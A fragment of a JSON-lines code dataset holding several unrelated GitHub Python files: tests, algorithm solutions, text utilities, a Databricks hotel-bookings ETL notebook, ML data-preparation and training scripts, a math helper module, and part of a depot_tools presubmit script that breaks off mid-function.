load_experiment_spec\n\ndetectnet_root = os.path.dirname(\n os.path.dirname(\n os.path.dirname(os.path.realpath(__file__))\n )\n)\ngt_training_spec = os.path.join(\n detectnet_root, \"experiment_specs/default_spec.txt\"\n)\ngt_inference_spec = os.path.join(\n detectnet_root, \"experiment_specs/inferencer_spec_etlt.prototxt\"\n)\n\ntopologies = [\n (\"train_val\", gt_training_spec),\n (\"inference\", gt_inference_spec),\n (\"train_val\", gt_inference_spec),\n (\"inference\", gt_training_spec),\n]\n\n\nclass TestDetectnetSpecloader():\n \"\"\"Simple class to test the specification file loader.\"\"\"\n\n @pytest.mark.parametrize(\n \"schema_validation, spec_file_path\", # noqa: E501\n topologies\n )\n def test_spec_loader(self, schema_validation, spec_file_path):\n \"\"\"Load and check if the spec file validator throws an error.\"\"\"\n error_raises = False\n if schema_validation == \"train_val\":\n if os.path.basename(spec_file_path) == \"inferencer_spec_etlt.prototxt\":\n error_raises = True\n elif schema_validation == \"inference\":\n if os.path.basename(spec_file_path) == \"default_spec.txt\":\n error_raises = True\n if error_raises:\n with pytest.raises((AssertionError, ParseError)):\n load_experiment_spec(spec_path=spec_file_path,\n merge_from_default=False,\n validation_schema=schema_validation)\n else:\n load_experiment_spec(\n spec_path=spec_file_path,\n merge_from_default=False,\n validation_schema=schema_validation)\n","repo_name":"NVIDIA/tao_tensorflow1_backend","sub_path":"nvidia_tao_tf1/cv/detectnet_v2/spec_handler/tests/test_spec_loader.py","file_name":"test_spec_loader.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"7055521619","text":"# Problem No.: 18790\n# Solver: Jinmin Goh\n# Date: 20200314\n# URL: https://www.acmicpc.net/problem/18790\n\n# currently TLE at 26%\n\nimport sys\n\nnotAnsSet = set()\n\ndef DFS(n: int, temp: int, numDict: {int:int}, ansDict = {int:int}) -> {int:int}:\n #print(temp, numDict, ansDict)\n if sum(list(ansDict.values())) == n and temp == 0:\n return ansDict\n tempTuple = []\n for j in ansDict:\n tempTuple.append((j, ansDict[j]))\n tempTuple.sort()\n tempTuple = tuple(tempTuple)\n if sum(list(ansDict.values())) >= n or tempTuple in notAnsSet:\n return\n for i in numDict:\n if numDict[i] == 0:\n continue\n else:\n #print(i, (temp - i) % n)\n numDict[i] -= 1\n ansDict[i] += 1\n tempDict = {}\n for j in ansDict:\n tempDict[j] = ansDict[j]\n tempAns = DFS(n, (temp - i) % n, numDict, tempDict)\n if tempAns:\n return tempAns\n tempTuple = []\n for j in tempDict:\n tempTuple.append((j, tempDict[j]))\n tempTuple.sort()\n tempTuple = tuple(tempTuple)\n notAnsSet.add(tempTuple)\n numDict[i] += 1\n ansDict[i] -= 1\n #print(tempAns)\n\ndef main():\n n = int(input())\n if n == 1:\n print(int(input()))\n return\n nums = list(map(int, sys.stdin.readline().split()))\n numDict = {}\n for i in nums:\n if i not in numDict:\n numDict[i] = 1\n else:\n numDict[i] += 1\n if numDict[i] == n:\n ans = [i] * n\n for j in ans:\n print(j, end = \" \")\n return\n ansDict = {}\n for i in range(n):\n ansDict[i] = 0 \n for i in numDict:\n numDict[i] -= 1\n ansDict[i] += 1\n ans = DFS(n, n - i, numDict, ansDict)\n numDict[i] += 1\n ansDict[i] -= 1\n if ans:\n break\n #print(ans)\n for i in ans:\n for j in range(ans[i]):\n print(i, end = \" \")\n return\n\nif __name__ == \"__main__\":\n main()","repo_name":"Jinmin-Goh/BOJ_PS","sub_path":"Solving/18790/18790.py","file_name":"18790.py","file_ext":"py","file_size_in_byte":2133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7639636355","text":"\"\"\"\nbuzzword explorer: making human-readable strings from data\n\"\"\"\nimport urllib.parse\n\nfrom buzz.constants import SHORT_TO_LONG_NAME\n\n\ndef _make_description(names, size):\n \"\"\"\n Describe a user-uploaded corpus\n \"\"\"\n desc = \"User-uploaded data, {}. {} file{}: {}\"\n form_names = \", \".join(names[:3])\n if len(names) > 3:\n form_names += \"...\"\n plu = \"s\" if len(names) != 1 else \"\"\n return desc.format(_format_size(size), len(names), plu, form_names)\n\n\ndef _make_table_name(history):\n \"\"\"\n Generate a table name from its history\n \"\"\"\n if history == \"initial\":\n return \"Part of speech tags by filename\"\n specs, show, subcorpora, relative, keyness, sort, multi, cont = history\n if subcorpora is None:\n subcorpora = \"corpus\"\n subcorpora = (\n SHORT_TO_LONG_NAME.get(subcorpora, subcorpora).lower().replace(\"_\", \" \")\n )\n show = [SHORT_TO_LONG_NAME.get(i, i).lower().replace(\"_\", \" \") for i in show]\n show = \"+\".join(show)\n relkey = \", rel. freq.\" if relative else \", keyness\"\n if keyness:\n relkey = f\"{relkey} ({keyness})\"\n if relative is False and keyness is False:\n relkey = \" showing absolute frequencies\"\n basic = f\"{show} by {subcorpora}{relkey}, sorting by {sort}\"\n if len(show) > 1 and multi:\n basic += \" (columns split)\"\n if not int(specs):\n return basic\n return f\"{basic} -- from search #{specs}\"\n\n\ndef _format_size(size):\n \"\"\"\n Format size in bytes, kb, or mb\n \"\"\"\n if size < 1000:\n return f\"{size} bytes\"\n if size >= 1000000:\n return f\"{size/1000000:.2f} MB\"\n if size >= 1000:\n return f\"{size/1000:.2f} kB\"\n\n\ndef _make_search_name(history, size, searches):\n \"\"\"\n Generate a search name from its history\n \"\"\"\n import locale\n\n trans = {0: \"match\", 1: \"bigrams\", 2: \"trigrams\"}\n\n locale.setlocale(locale.LC_ALL, \"\")\n if isinstance(history, str):\n return f\"Search entire corpus: {history} ({size:n} tokens)\"\n previous, col, skip, search_string, gram, n, n_results, _ = history\n no = \"not \" if skip else \"\"\n col = SHORT_TO_LONG_NAME.get(col, col)\n relative_corpus = n_results * 100 / size\n prev_total = previous[-2] if isinstance(previous, (tuple, list)) else None\n rel_last = \"\"\n if prev_total is not None:\n rel_last = n_results * 100 / prev_total\n rel_last = f\"/{rel_last:.2f}%\"\n freq = f\"(n={n_results:n}{rel_last}/{relative_corpus:.2f}%)\"\n show = \" \" if not gram else f\"(showing {trans[gram]}) \"\n basic = f\"{col} {no}matching '{search_string}' {show}{freq}\"\n hyphen = \"\"\n while previous:\n hyphen += \"──\"\n previous = int(searches[str(previous)][0])\n if hyphen:\n basic = f\"└{hyphen} \" + basic\n return f\"({n}) {basic}\"\n\n\ndef _search_error(col, search_string):\n \"\"\"\n Check for problems with search\n \"\"\"\n if not search_string:\n return \"No search string provided.\"\n if not col:\n return \"No feature selected to search.\"\n return \"\"\n\n\ndef _table_error(show, subcorpora, updating):\n \"\"\"\n Check for problems with table\n \"\"\"\n if updating:\n return \"\"\n errors = []\n if not show:\n errors.append(\"No choice made for feature to use as columns.\")\n # this is now allowed ... can probably remove this function if\n # we don't do any extra validations.\n if not subcorpora:\n errors.append(\"No choice made for feature to use as index.\")\n if not errors:\n return \"\"\n plural = \"s\" if len(errors) > 1 else \"\"\n return f\"Error{plural}\\n* \" + \"\\n* \".join(errors)\n\n\ndef _capitalize_first(s):\n \"\"\"\n First letter capitalised and notheing else\n \"\"\"\n return s[0].upper() + s[1:]\n\n\ndef _downloadable_name(name):\n \"\"\"\n Make a safe filename for CSV download. todo: url safe?\n \"\"\"\n name = name.lower().split(\"-- from \")[0]\n name = name.replace(\" \", \"-\")\n ok = {\"-\", \"_\"}\n name = \"\".join([i for i in name if i.isalnum() or i in ok])\n return name.strip(\"- \").lower()\n\n\ndef _slug_from_name(name):\n \"\"\"\n Make a slug from an (uploaded) corpus name\n \"\"\"\n name = name.replace(\" \", \"-\").lower()\n return urllib.parse.quote_plus(name)\n","repo_name":"cyberprotectionservice/buzzword","sub_path":"explorer/parts/strings.py","file_name":"strings.py","file_ext":"py","file_size_in_byte":4213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11860840847","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Aug 20 20:14:19 2021\n\n@author: Lenovo\n\"\"\"\n\n\ndef sortArray(nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[int]\n \"\"\"\n def heapify(i, end, tree):\n if i >= end:\n return\n child1 = 2*i+1\n child2 = 2*i+2\n max_i = i\n if child1 < end and tree[child1] > tree[max_i]:\n max_i = child1\n if child2 < end and tree[child2] > tree[max_i]:\n max_i = child2\n if i != max_i:\n tree[i], tree[max_i] = tree[max_i], tree[i]\n heapify(max_i, end, tree)\n\n def buildheap(end, tree):\n last_i = end-1\n last_parent = (last_i - 1) // 2\n while last_parent >= 0:\n heapify(last_parent, end, tree)\n last_parent -= 1\n\n end = len(nums)\n buildheap(end, nums)\n while True:\n if end <= 1:\n break\n heapify(0, end, nums)\n nums[0], nums[end-1] = nums[end-1], nums[0]\n end -= 1\n\n\n\n\nnums = [5, 2, 3, 1]\nsortArray(nums)\n","repo_name":"liu-yuxin98/LeetCodeHot100","sub_path":"Arrays/912.py","file_name":"912.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"27332313977","text":"# Databricks notebook source\n\n\n# COMMAND ----------\n\nfrom pyspark.sql.functions import *\nfrom pyspark.sql.functions import col\nfrom utils.utils import DataPreprocessor\n\n# COMMAND ----------\n\n# Define the path to the mounted directory\npath = \"/mnt/myblob/\"\n\n# Get a list of all files in the mounted directory\nfiles = dbutils.fs.ls(path)\n\n# Filter the list to include only JSON files\njson_files = [f for f in files if f.name.endswith(\".json\")]\n\n# Sort the list by the modification time of each file, in descending order\nsorted_files = sorted(json_files, key=lambda f: f.modificationTime, reverse=True)\n\n# Get the path to the latest modified file\nlatest_file_path = sorted_files[0].path\n\n# Read the data from the latest modified file into a DataFrame\ndf = spark.read.option(\"inferSchema\", \"true\").option(\"multiline\", \"true\").json(latest_file_path)\n\n# COMMAND ----------\n\n# Un-nest the json format\ndf = df.select('root.*')\ndf = df.withColumn(\"page\", explode(df[\"page\"]))\ndf = df.select(\"page.*\")\ndf = df.select('pageurl',\"record.*\")\ndf = df.select(\"pageurl\", \"uniq_id\", \"hotel_id\", \"hotel_name\", \"review_count\", \"rating_count\", \"default_rank\", \"price_rank\", \"ota\", \"checkin_date\", \"crawled_date\", explode(\"room_type\").alias(\"room_type\"))\ndf = df.select(\"pageurl\", \"uniq_id\", \"hotel_id\", \"hotel_name\", \"review_count\", \"rating_count\", \"default_rank\", \"price_rank\", \"ota\", \"checkin_date\", \"crawled_date\", \"room_type.*\")\n\n\n# COMMAND ----------\n\n# Correct the data types\ndf_silver = df.withColumn('hotel_id', df.hotel_id.cast('int')) \\\n .withColumn('review_count', df.review_count.cast('float')) \\\n .withColumn('rating_count', df.rating_count.cast('float')) \\\n .withColumn('default_rank', df.default_rank.cast('int')) \\\n .withColumn('price_rank', df.price_rank.cast('int')) \\\n .withColumn('checkin_date', to_date(col('checkin_date'), 'yyyy-MM-dd')) \\\n .withColumn(\"crawled_date\", to_timestamp(col(\"crawled_date\"),\"yyyy-MM-dd HH:mm:ss Z\")) \\\n .withColumn('room_type_price', df.room_type_price.cast('float'))\n\n# COMMAND ----------\n\n# Initialize utils class\npreprocessor = DataPreprocessor(df_silver,threshold=10)\n\n# COMMAND ----------\n\n#Data checks\npreprocessor.count_rows(df_silver)\npreprocessor.num_columns(df_silver,16)\n\n# COMMAND ----------\n\n# Check for nulls\nabove,below = preprocessor.get_nulls(df_silver,threshold=10)\n# Get null report\npreprocessor.null_status(10,above,below)\n\n# COMMAND ----------\n\n# check for nulls and remove columns with more than 10% null values\nno_nulls = preprocessor.remove_nulls(df_silver,above,rows=False)\n\n# COMMAND ----------\n\n#Data checks\npreprocessor.count_rows(no_nulls)\nno_columns = len(df_silver.columns)-len(above)\npreprocessor.num_columns(no_nulls,no_columns)\n\n# COMMAND ----------\n\n# Remove the rows with null values\nno_nulls_rows = preprocessor.remove_nulls(no_nulls,below,rows=True)\n\n# COMMAND ----------\n\n# Remove duplicates\nno_duplicates = preprocessor.check_duplicates(no_nulls_rows)\n\n# COMMAND ----------\n\n# Last check for remaining nulls\nlast_above,last_below = preprocessor.get_nulls(no_duplicates,0)\npreprocessor.null_status(0,last_above,last_below)\n\n# COMMAND ----------\n\n# Write the data to silver data base\nno_duplicates.write.format(\"delta\").mode(\"overwrite\").option(\"mergeSchema\", \"true\").save(\"dbfs:/user/hive/warehouse/silver/bookings_silver\")\n\n# COMMAND ----------\n\n# Data quality check on silver tables\npreprocessor.db_quality_check('silver')\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC -- what was the total income of hotels based on bookings they had in 2019\n# MAGIC WITH rev AS (\n# MAGIC SELECT \n# MAGIC hotel_id as id,\n# MAGIC hotel_name as name,\n# MAGIC round(SUM(room_type_price),0) AS revenue\n# MAGIC FROM silver.bookings_silver\n# MAGIC GROUP BY 1,2\n# MAGIC ORDER BY SUM(room_type_price) DESC)\n# MAGIC INSERT INTO gold.revenue(hotel_id,hotel_name,revenue)\n# MAGIC SELECT id,name,revenue FROM rev\n# MAGIC WHERE NOT EXISTS (\n# MAGIC SELECT 1 FROM gold.revenue\n# MAGIC WHERE hotel_id = id AND hotel_name = name\n# MAGIC )\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC WITH Quarter AS(\n# MAGIC SELECT\n# MAGIC hotel_id as Id,\n# MAGIC hotel_name as Name,\n# MAGIC count(*) AS Bookings,\n# MAGIC \n# MAGIC date_format(checkin_date, 'MM') AS Month,\n# MAGIC \n# MAGIC CASE \n# MAGIC WHEN date_format(checkin_date, 'MM') BETWEEN '01' AND '03' THEN 'Q1'\n# MAGIC WHEN date_format(checkin_date, 'MM') BETWEEN '03' AND '06' THEN 'Q2'\n# MAGIC WHEN date_format(checkin_date, 'MM') BETWEEN '06' AND '09' THEN 'Q3' \n# MAGIC ELSE 'Q4'\n# MAGIC END AS Quarter \n# MAGIC FROM silver.bookings_silver\n# MAGIC GROUP BY 1,2,4,5\n# MAGIC )\n# MAGIC INSERT INTO gold.month_quarter_demand(hotel_id,hotel_name,bookings,month,quarter,month_quarter,demand)\n# MAGIC SELECT \n# MAGIC Id,\n# MAGIC Name,\n# MAGIC Bookings,\n# MAGIC Month,\n# MAGIC Quarter,\n# MAGIC CONCAT(Month, '_', Quarter), \n# MAGIC Bookings - COALESCE(lag(Bookings) OVER (PARTITION BY Id ORDER BY Month, Quarter), 0) AS Difference\n# MAGIC FROM Quarter\n# MAGIC WHERE NOT EXISTS (\n# MAGIC SELECT 1 FROM gold.revenue\n# MAGIC WHERE hotel_id = id AND hotel_name = name\n# MAGIC )\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC WITH rooms AS (SELECT \n# MAGIC b.hotel_id AS id, \n# MAGIC b.hotel_name, \n# MAGIC b.room_type_breakfast AS breakfast, \n# MAGIC b.room_type_cancellation AS cancellation, \n# MAGIC b.room_type_name AS room_name,\n# MAGIC round(AVG(b.room_type_price),0) AS avg_price,\n# MAGIC round(AVG(b.room_type_occupancy),0) AS avg_num_persons,\n# MAGIC COUNT(b.crawled_date) AS bookings,\n# MAGIC a.avg_days_diff\n# MAGIC FROM \n# MAGIC silver.bookings_silver b\n# MAGIC INNER JOIN (\n# MAGIC SELECT \n# MAGIC hotel_id, \n# MAGIC hotel_name, \n# MAGIC room_type_breakfast, \n# MAGIC room_type_cancellation, \n# MAGIC room_type_name,\n# MAGIC ROUND(AVG(DATEDIFF(checkin_date,CAST(crawled_date AS DATE))),0) AS avg_days_diff\n# MAGIC FROM \n# MAGIC silver.bookings_silver \n# MAGIC GROUP BY 1,2,3,4,5\n# MAGIC ) a ON \n# MAGIC b.hotel_id = a.hotel_id AND \n# MAGIC b.hotel_name = a.hotel_name AND \n# MAGIC b.room_type_breakfast = a.room_type_breakfast AND \n# MAGIC b.room_type_cancellation = a.room_type_cancellation AND \n# MAGIC b.room_type_name = a.room_type_name\n# MAGIC GROUP BY \n# MAGIC 1,2,3,4,5,9\n# MAGIC )\n# MAGIC INSERT INTO gold.rooms_overview(hotel_id, hotel_name, breakfast, cancelation, room_name, avg_price,avg_num_persons, bookings, avg_days_dif)\n# MAGIC SELECT \n# MAGIC id,\n# MAGIC hotel_name,\n# MAGIC breakfast,\n# MAGIC cancellation,\n# MAGIC room_name,\n# MAGIC avg_price,\n# MAGIC avg_num_persons,\n# MAGIC bookings,\n# MAGIC avg_days_diff\n# MAGIC FROM rooms\n# MAGIC WHERE NOT EXISTS (\n# MAGIC SELECT 1 FROM gold.rooms_overview\n# MAGIC WHERE hotel_id = id AND hotel_name = hotel_name\n# MAGIC )\n\n# COMMAND ----------\n\n# Run quality checks on gold tables\npreprocessor.db_quality_check('gold')\n\n# COMMAND ----------\n\n\n","repo_name":"georgezefko/databrickspipeline","sub_path":"src/BookingsETL.py","file_name":"BookingsETL.py","file_ext":"py","file_size_in_byte":7236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71730367207","text":"import matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport sklearn\nimport pandas as pd\nimport os\nimport sys\nimport time\nimport tensorflow as tf\n\nfrom tensorflow import keras\n#print(tf.__verison__)\nprint(sys.version_info)\n#for module in mpl, np, pd, sklearn, tf, keras:\n # print(module.__name__,module.__version__)\n\nfrom sklearn.datasets import fetch_california_housing\nhousing = fetch_california_housing()\n\nfrom sklearn.model_selection import train_test_split\nx_train_all, x_test, y_train_all, y_test = train_test_split(housing.data,housing.target,random_state=7)\nx_train, x_valid, y_train,y_valid = train_test_split(x_train_all,y_train_all,random_state=11)\nprint(x_train.shape,y_train.shape)\nprint(x_valid.shape,y_valid.shape)\nprint(x_test.shape,y_test.shape)\n\nfrom sklearn.preprocessing import StandardScaler\nscaler = StandardScaler()\nx_train_scaled = scaler.fit_transform(x_train)\nx_valid_scaled = scaler.transform(x_valid)\nx_test_scaled = scaler.transform(x_test)\noutput_dir = \"generate_csv\"\nif not os.path.exists(output_dir):\n os.mkdir(output_dir)\n\ndef save_to_csv(out_dir,data,name_prefix,header=None,n_parts=10):\n path_format = os.path.join(output_dir,\"{}_{:02d}.csv\")\n filenames = []\n\n for file_idx, row_indices in enumerate(\n np.array_split(np.arange(len(data)),n_parts)):\n part_csv = path_format.format(name_prefix,file_idx)\n filenames.append(part_csv)\n with open(part_csv,'wt',encoding=\"utf-8\") as f:\n if header is not None:\n f.write(header + \"\\n\")\n for row_index in row_indices:\n f.write(\",\".join([repr(col) for col in data[row_index]]))\n f.write('\\n')\n return filenames\n\ntrain_data = np.c_[x_train_scaled,y_train]\nvalid_data = np.c_[x_valid_scaled,y_valid]\ntest_data = np.c_[x_test_scaled,y_test]\nheader_cols = housing.feature_names+[\"MidianHouseValue\"]\nheader_str = \",\".join(header_cols)\ntrain_filename = save_to_csv(output_dir,train_data,\"train\",header_str,n_parts=20)\nvalid_filename = save_to_csv(output_dir,valid_data,\"valid\",header_str,n_parts=10)\ntest_filename = save_to_csv(output_dir,test_data,\"test\",header_str,n_parts=10)\n","repo_name":"Dylanin1999/Tensorflow2.0","sub_path":"4 第四章/4-3 生成csv文件.py","file_name":"4-3 生成csv文件.py","file_ext":"py","file_size_in_byte":2182,"program_lang":"python","lang":"en","doc_type":"code","stars":103,"dataset":"github-code","pt":"53"} +{"seq_id":"15921729298","text":"import argparse\nfrom typing import Optional, Sequence\n\nimport mlflow\nfrom prefect import flow\nfrom prefect.task_runners import SequentialTaskRunner\n\nfrom src.data.preprocess import prepare_data, read_data, split_data\nfrom src.env import (\n ENCODER_PATH,\n EXPERIMENT_NAME,\n MLFLOW_TRACKING_URI,\n NUM_TRIALS,\n TOP_N,\n)\nfrom src.models.hpo import optimize_logistic, optimize_xgboost\nfrom src.models.register import register_best_model\nfrom src.utils import serialize_object\n\n\n@flow(task_runner=SequentialTaskRunner())\ndef train_flow(data_path: str) -> None:\n df = read_data(data_path)\n (features, target), enc = prepare_data(df) # type: ignore\n\n if not ENCODER_PATH:\n raise ValueError(\"ENCODER_PATH environment variable is not defined.\")\n serialize_object(enc, ENCODER_PATH)\n\n train, valid, test = split_data(features, target) # type: ignore\n mlflow.set_tracking_uri(MLFLOW_TRACKING_URI)\n mlflow.set_experiment(EXPERIMENT_NAME)\n\n optimize_logistic(*train, *valid, NUM_TRIALS) # type: ignore\n optimize_xgboost(*train, *valid, NUM_TRIALS) # type: ignore\n register_best_model(*test, TOP_N) # type: ignore\n\n\ndef main(argv: Optional[Sequence[str]] = None) -> None:\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-i\", \"--input-path\", required=True)\n args = parser.parse_args(argv)\n\n train_flow(args.input_path)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Alvaro-Kothe/Mushroom-Classification","sub_path":"src/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20851520136","text":"# PyMathTools by John Elizarraras\n# This is free and please make any changes you want no need for credit\nfrom math import gcd\n\n__all__ = ['binary_search', 'mod', 'to_ints', 'read_file', 'latex_gen_graph', 'elliptic_card', 'is_prime']\n\n\ndef binary_search(array, target):\n \"\"\" Does a binary search on to find the index of an element in an array. WARNING - ARRAY HAS TO BE SORTED\n Keyword arguments:\n array - the array that contains the target\n target - the target element for which its index will be returned\n returns the index of target in array\n \"\"\"\n lower = 0\n upper = len(array)\n while lower < upper:\n x = lower + (upper - lower) // 2\n val = array[x]\n if target == val:\n return x\n elif target > val:\n if lower == x:\n break\n lower = x\n elif target < val:\n upper = x\n\ndef mod(n, modulus):\n ''' A safer mod funtion instead of %, where fractions are acurately calculated\n Keyword arguments:\n n - the number to take modulo by\n modulus - the modulus\n returns n mod modulus\n '''\n if not(float(modulus).is_integer()):\n raise ValueError('Modulus is not an integer')\n elif float(n).is_integer():\n return n % modulus\n else:\n if float(1/n).is_integer():\n if gcd(int(1/n), int(modulus)) != 1:\n raise ValueError('Inverse of n is not coprime with modulus')\n n = int(1/n)\n i = 1\n while (n * i) % modulus != 1:\n i = i + 1\n return i\n else:\n raise ValueError('Inverse of n is not an integer and n is a fraction')\n\ndef to_ints(array):\n ''' converts everything in an array into ints\n\n Keyword arguments\n array - the array containing the ints\n returns an array with the conveted ints\n '''\n for i in range(len(array)):\n array[i] = int(array[i])\n return array\n\ndef read_file(f):\n ''' reads a file and converts the file into an array of floats. It seperates numbers by spaces and will go through all the lines. You can use the to_ints function to convert it.\n\n Keyword arguments:\n f - the path/name of the file\n\n returns an array of floats\n '''\n r = open(f, \"r\")\n s = str(r.readline())\n a = []\n while s != \"\":\n s = s.strip().split(\" \")\n for i in s:\n a.append(float(i))\n s = str(r.readline())\n return a\n\ndef latex_gen_graph(array, title, xaxis, yaxis, xmin, ymin, xmax, ymax):\n ''' generates a tikz graph with the provided points\n ----\n if there are too many points(out of memory) try using 'pdflatex --enable-write18 --extra-mem-bot=10000000 --synctex=1 ' to make it compile\n ---\n\n Keyword arguments:\n array - A 2d array where the first column is the x value and the second is the y\n title(str) - the title of the graph. This will also be the title of the produced tex file\n xaxis(str) - the label for the x axis\n yaxis(str) - the label for the x axis\n xmin - the min x value on the x axis\n ymin - the min y value on the y axis\n xmax - the max x value on the x axis\n ymax - the max y value on y axis\n '''\n w = open(title + \".tex\", \"w+\")\n w.write(\"\\\\documentclass{amsart}\\n\\\\usepackage{pgfplots}\\n\\\\begin{document}\\n\\\\begin{tikzpicture}\\n\\\\begin{axis}[\\ntitle = {\"+ title + \"},\\nxlabel={\"+ xaxis +\"},\\nylabel={\" + yaxis + \"},\\nxmin = \" + str(xmin) + \", xmax=\" + str(xmax) + \",\\n\")\n w.write(\"ymin=\" + str(ymin) + \", ymax=\" + str(ymax) + \",\\nlegend pos=north west,\\nymajorgrids=true,\\ngrid style=dashed,\\n]\\n\\n\")\n w.write(\"\\\\addplot[\\ncolor=blue,\\nmark=square,\\n]\\ncoordinates {\\n\")\n for i in range(len(array)):\n w.write(\"(\" + str(array[i][0]) + \",\" + str(array[i][1]) + \")\")\n w.write(\"\\n};\\n\\n\")\n w.write(\"\\end{axis}\\n\\end{tikzpicture}\\n\\end{document}\")\n\ndef elliptic_card(a,b,m):\n ''' Gets the cardinality(number of solutions) on an elliptic curve. Follows form y^2 = x^3 + ax + b mod m. Counts the point at infinity\n Keyword arguments:\n a - the a value in the formula\n b - the b value in the formula\n\n returns an int of the cardinality of the function\n '''\n x = []\n y = []\n card = 1\n for i in range(m):\n y.append(mod(i**2, m))\n for i in range(m):\n x.append(mod((i**3 + a*i + b), m))\n for i in range(len(x)):\n for j in range(len(y)):\n if x[i] == y[j]:\n card = card + 1\n return card\n\ndef is_prime(n):\n \"\"\" Checks if a number is prime.\n\n Keyword arguments:\n n - the possible prime to check\n returns true if n is prime but false if not.\n \"\"\"\n if n == 2:\n return True\n if n == 3:\n return True\n if n % 2 == 0:\n return False\n if n % 3 == 0:\n return False\n\n i = 5\n w = 2\n\n while i * i <= n:\n if n % i == 0:\n return False\n\n i += w\n w = 6 - w\n\n return True\n","repo_name":"iblacksand/PyMathTools","sub_path":"PyMathTools.py","file_name":"PyMathTools.py","file_ext":"py","file_size_in_byte":4983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32215102383","text":"PRESUBMIT_VERSION = '2.0.0'\n\nimport fnmatch\nimport os\nimport sys\n\n# CIPD ensure manifest for checking CIPD client itself.\nCIPD_CLIENT_ENSURE_FILE_TEMPLATE = r'''\n# Full supported.\n$VerifiedPlatform linux-amd64 mac-amd64 windows-amd64 windows-386\n# Best effort support.\n$VerifiedPlatform linux-386 linux-ppc64 linux-ppc64le linux-s390x\n$VerifiedPlatform linux-arm64 linux-armv6l\n$VerifiedPlatform linux-mips64 linux-mips64le linux-mipsle\n\n%s %s\n'''\n\n# Timeout for a test to be executed.\nTEST_TIMEOUT_S = 330 # 5m 30s\n\n\ndef CheckPylint(input_api, output_api):\n \"\"\"Gather all the pylint logic into one place to make it self-contained.\"\"\"\n files_to_check = [\n r'^[^/]*\\.py$',\n r'^testing_support/[^/]*\\.py$',\n r'^tests/[^/]*\\.py$',\n r'^recipe_modules/.*\\.py$', # Allow recursive search in recipe modules.\n ]\n files_to_skip = list(input_api.DEFAULT_FILES_TO_SKIP)\n if os.path.exists('.gitignore'):\n with open('.gitignore', encoding='utf-8') as fh:\n lines = [l.strip() for l in fh.readlines()]\n files_to_skip.extend([fnmatch.translate(l) for l in lines if\n l and not l.startswith('#')])\n if os.path.exists('.git/info/exclude'):\n with open('.git/info/exclude', encoding='utf-8') as fh:\n lines = [l.strip() for l in fh.readlines()]\n files_to_skip.extend([fnmatch.translate(l) for l in lines if\n l and not l.startswith('#')])\n disabled_warnings = [\n 'R0401', # Cyclic import\n 'W0613', # Unused argument\n 'C0415', # import-outside-toplevel\n 'R1710', # inconsistent-return-statements\n 'E1101', # no-member\n 'E1120', # no-value-for-parameter\n 'R1708', # stop-iteration-return\n 'W1510', # subprocess-run-check\n # Checks which should be re-enabled after Python 2 support is removed.\n 'R0205', # useless-object-inheritance\n 'R1725', # super-with-arguments\n 'W0707', # raise-missing-from\n 'W1113', # keyword-arg-before-vararg\n ]\n return input_api.RunTests(input_api.canned_checks.GetPylint(\n input_api,\n output_api,\n files_to_check=files_to_check,\n files_to_skip=files_to_skip,\n disabled_warnings=disabled_warnings,\n version='2.7'), parallel=False)\n\n\ndef CheckRecipes(input_api, output_api):\n file_filter = lambda x: x.LocalPath() == 'infra/config/recipes.cfg'\n return input_api.canned_checks.CheckJsonParses(input_api, output_api,\n file_filter=file_filter)\n\n\ndef CheckUsePython3(input_api, output_api):\n results = []\n\n if sys.version_info.major != 3:\n results.append(\n output_api.PresubmitError(\n 'Did not use Python3 for //tests/PRESUBMIT.py.'))\n\n return results\n\n\ndef CheckJsonFiles(input_api, output_api):\n return input_api.canned_checks.CheckJsonParses(\n input_api, output_api)\n\n\ndef CheckUnitTestsOnCommit(input_api, output_api):\n \"\"\" Do not run integration tests on upload since they are way too slow.\"\"\"\n\n input_api.SetTimeout(TEST_TIMEOUT_S)\n\n # Run only selected tests on Windows.\n test_to_run_list = [r'.*test\\.py$']\n tests_to_skip_list = []\n if input_api.platform.startswith(('cygwin', 'win32')):\n print('Warning: skipping most unit tests on Windows')\n tests_to_skip_list.extend([\n r'.*auth_test\\.py$',\n r'.*git_common_test\\.py$',\n r'.*git_hyper_blame_test\\.py$',\n r'.*git_map_test\\.py$',\n r'.*ninjalog_uploader_test\\.py$',\n r'.*recipes_test\\.py$',\n ])\n\n tests = input_api.canned_checks.GetUnitTestsInDirectory(\n input_api,\n output_api,\n 'tests',\n files_to_check=test_to_run_list,\n files_to_skip=tests_to_skip_list)\n\n return input_api.RunTests(tests)\n\n\ndef CheckCIPDManifest(input_api, output_api):\n # Validate CIPD manifests.\n root = input_api.os_path.normpath(\n input_api.os_path.abspath(input_api.PresubmitLocalPath()))\n rel_file = lambda rel: input_api.os_path.join(root, rel)\n cipd_manifests = set(rel_file(input_api.os_path.join(*x)) for x in (\n ('cipd_manifest.txt',),\n ('bootstrap', 'manifest.txt'),\n ('bootstrap', 'manifest_bleeding_edge.txt'),\n\n # Also generate a file for the cipd client itself.\n ('cipd_client_version',),\n ))\n affected_manifests = input_api.AffectedFiles(\n include_deletes=False,\n file_filter=lambda x:\n input_api.os_path.normpath(x.AbsoluteLocalPath()) in cipd_manifests)\n tests = []\n for path in affected_manifests:\n path = path.AbsoluteLocalPath()\n if path.endswith('.txt'):\n 